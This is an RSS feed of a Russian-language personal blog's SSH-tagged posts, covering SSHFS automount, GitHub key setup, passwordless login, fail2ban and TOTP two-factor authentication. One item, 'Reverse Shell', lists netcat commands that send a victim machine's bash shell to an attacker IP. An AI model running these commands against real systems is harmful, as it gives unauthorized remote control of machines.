<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Ssh on fruworg</title><link>https://fruw.supa.dog/tags/ssh/</link><description>Recent content in Ssh on fruworg</description><generator>Hugo -- gohugo.io</generator><language>ru-RU</language><lastBuildDate>Thu, 19 Sep 2024 13:28:00 +0200</lastBuildDate><atom:link href="https://fruw.supa.dog/tags/ssh/index.xml" rel="self" type="application/rss+xml"/><item><title>Автомонтирование SSHFS</title><link>https://fruw.supa.dog/posts/sshfs-fstab/</link><pubDate>Thu, 19 Sep 2024 13:28:00 +0200</pubDate><guid>https://fruw.supa.dog/posts/sshfs-fstab/</guid><description>Установка пакета на клиенте apt -y install sshfs Добавление строки в /etc/fstab &amp;lt;user&amp;gt;@&amp;lt;server-fqdn&amp;gt;:&amp;lt;remote-dir&amp;gt; &amp;lt;local-dir&amp;gt; sshfs allow_other,reconnect 0 Проверка монтирования mount -a</description></item><item><title>Работа с репозиториями GitHub через терминал</title><link>https://fruw.supa.dog/posts/github-ssh-auth/</link><pubDate>Wed, 26 Jul 2023 16:29:00 +0600</pubDate><guid>https://fruw.supa.dog/posts/github-ssh-auth/</guid><description>Генерация ключа ssh-keygen -t ed25519 -C &amp;#34;&amp;lt;your&amp;gt;@&amp;lt;ema.il&amp;gt;&amp;#34; Вывод публичного ключа cat ~/.ssh/id_ed25519.pub Добавление ключа в GitHub Необходимо зайти на GitHub в настройки своего аккаунта и перейти в раздел &amp;ldquo;SSH and GPG keys&amp;rdquo;. Далее нужно нажать &amp;ldquo;New SSH key&amp;rdquo;, вставить содержимое публичного ключа и сохранить изменения.
Аутентификация в GitHub git remote set-url origin git@github.com:&amp;lt;username&amp;gt;/&amp;lt;reponame&amp;gt;.git</description></item><item><title>Беспарольная аутентификация для SSH</title><link>https://fruw.supa.dog/posts/ssh-auth-by-key/</link><pubDate>Wed, 14 Dec 2022 12:04:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/ssh-auth-by-key/</guid><description>Генерация ключа ssh-keygen Копировние ключв ssh-copy-id &amp;lt;username&amp;gt;@&amp;lt;server-ip&amp;gt;</description></item><item><title>Reverse Shell</title><link>https://fruw.supa.dog/posts/reverse-shell-nc/</link><pubDate>Fri, 09 Dec 2022 15:02:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/reverse-shell-nc/</guid><description>Машина атакующего nc -lvp &amp;lt;port&amp;gt; Машина жертвы (Traditional Netcat) nc &amp;lt;attacker-ip&amp;gt; &amp;lt;port&amp;gt; -e /bin/bash Машина жертвы (OpenBSD Netcat) mkfifo /tmp/rev; nc &amp;lt;attacker-ip&amp;gt; &amp;lt;port&amp;gt; &amp;lt; /tmp/rev | /bin/bash 2&amp;gt;&amp;amp;1 | tee /tmp/rev &amp;gt; /dev/null</description></item><item><title>fail2ban для SSH</title><link>https://fruw.supa.dog/posts/ssh-fail2ban/</link><pubDate>Tue, 29 Nov 2022 13:41:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/ssh-fail2ban/</guid><description>Установка пакета fail2ban apt -y install fail2ban Правило для ssh В файл /etc/fail2ban/jail.d/sshd.conf необходимо добавить следующее:
[sshd] enabled = true port = &amp;lt;ssh-port&amp;gt; filter = sshd logpath = /var/log/auth.log maxretry = 3 findtime = 300 bantime = 3600 Перезапуск сервиса fail2ban systemctl restart fail2ban</description></item><item><title>Двухфакторная аутентификация для SSH</title><link>https://fruw.supa.dog/posts/ssh-2fa-totp/</link><pubDate>Tue, 29 Nov 2022 13:35:00 +0500</pubDate><guid>https://fruw.supa.dog/posts/ssh-2fa-totp/</guid><description>Установка пакета apt install -y openssh-server libpam-google-authenticator Правка конфига PAM В файл /etc/pam.d/common-auth необходимо добавить следующее:
auth required pam_google_authenticator.so Правка конфига ssh В файл /etc/ssh/sshd_config необходимо добавить следующее:
ChallengeResponseAuthentication yes Конфигурация аутентификации Следующая команда сконфигурирует TOTP. Запускать команду следует от имени того пользователя, к которому будет инициализированно подключение.
google-authenticator Управление факторами (необязательно) Для запроса ключа при аутентификации необходимо в файл /etc/ssh/sshd_config добавить следующее:
AuthenticationMethods publickey,password publickey,keyboard-interactive Для отключения запроса пароля при аутентификации необходимо в файле /etc/pam.</description></item></channel></rss>